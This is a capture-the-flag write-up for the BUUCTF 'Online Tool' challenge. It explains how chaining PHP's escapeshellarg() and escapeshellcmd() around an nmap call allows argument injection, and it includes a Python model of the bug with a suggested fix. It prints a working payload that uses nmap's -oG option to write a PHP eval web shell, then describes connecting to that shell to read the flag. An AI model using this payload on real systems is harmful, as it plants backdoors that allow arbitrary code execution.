BUUCTF WEB [BUUCTF 2018]Online Tool
2022-04-23 12:33:00 【Y1Daa】
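On entering the challenge environment, we are given the following source code:

```php
<?php
// The client-supplied X-Forwarded-For header is trusted as the remote address
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if (!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    // Two filters applied in sequence to the same value
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    // Per-client working directory derived from the remote address
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
```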
In this code, escapeshellarg() converts a string into a form that can be used as an argument in a shell command: it escapes special symbols such as single quotes, and wraps each escaped single quote in another pair of single quotes.

```php
<?php
echo escapeshellarg("123");    // '123'
echo escapeshellarg("12' 3");  // '12'\'' 3'
?>
```

escapeshellcmd() escapes shell metacharacters: it inserts a backslash (\) before special characters and before unpaired single quotes.

```php
<?php
echo escapeshellcmd("123");     // 123
echo escapeshellcmd("12' 3");   // 12\' 3
echo escapeshellcmd("12'' 3");  // 12'' 3
?>
```
For how to approach this problem, see the article "Talking about escapeshellarg parameter bypass and injection problems" (lmxspace.com).
Because of the two filters, we can only execute a single command. nmap has several output options:

```
OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
```

These options write the command and its results to a file.
Here, the combined use of escapeshellarg() and escapeshellcmd() lets us construct a command execution vulnerability:

```
?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php '
```
The response is:

```
you are in sandbox ae49321bc77b6271cb2db4ba23d835f1Starting Nmap 7.70 ( https://nmap.org ) at 2022-04-22 05:26 UTC
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
```
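Why chaining the two filters breaks the argument boundary, as an added example that is not part of the original write-up or the challenge code: `escapeshellarg` and `escapeshellcmd` below are simplified Python models of the PHP functions' behaviour on Linux, `shlex` stands in for the shell's word splitting, and the sample input is constructed and benign. `shell_words`, `vulnerable` and `hardened` are hypothetical helper names.

```python
import shlex

# Simplified models of the two PHP functions as they behave on Linux
# (assumption: multibyte/locale handling and the \xFF byte are ignored).
META = set("#&;`|*?~<>^()[]{}$\\\n")

def escapeshellarg(s):
    """Quote s as one shell word; each ' becomes '\\'' ."""
    return "'" + s.replace("'", "'\\''") + "'"

def escapeshellcmd(s):
    """Backslash-escape metacharacters and any quote that has no partner."""
    out, closing = [], None              # closing: index of the quote ending a pair
    for i, ch in enumerate(s):
        if ch in "'\"":
            nxt = s.find(ch, i + 1)
            if closing is None and nxt != -1:
                closing = nxt            # opens a pair: left untouched
            elif closing is not None and s[closing] == ch:
                closing = None           # closes a pair: left untouched
            else:
                out.append("\\")         # unpaired quote: escaped
        elif ch in META:
            out.append("\\")             # includes the backslash itself
        out.append(ch)
    return "".join(out)

def shell_words(arg_string):
    """Split like a POSIX shell, exposing the real argument boundaries."""
    return shlex.split(arg_string)

def vulnerable(host):
    """The page's pattern: both filters, in that order."""
    return shell_words(escapeshellcmd(escapeshellarg(host)))

def hardened(host):
    """Hypothetical fix: escape exactly once, as an argument."""
    return shell_words(escapeshellarg(host))

if __name__ == "__main__":
    sample = "127.0.0.1' -v -d a=1"      # constructed, benign input
    print(escapeshellcmd(escapeshellarg(sample)))
    print(vulnerable(sample))            # → ['127.0.0.1\\', '-v', '-d', "a=1'"]
    print(hardened(sample))              # → ["127.0.0.1' -v -d a=1"]
```

With both filters the backslash that protected the embedded quote is itself escaped, so the text after it leaves the quoted region and is parsed as separate options. Applying escapeshellarg() alone, to a value already validated as an IP address or hostname, keeps it a single argument.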
Connect with AntSword and find the flag file in the root directory.
flag{24d949bf-db37-41b9-9e74-9f9e202d0af7}
Copyright notice
This article was written by [Y1Daa]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/04/202204231227159591.html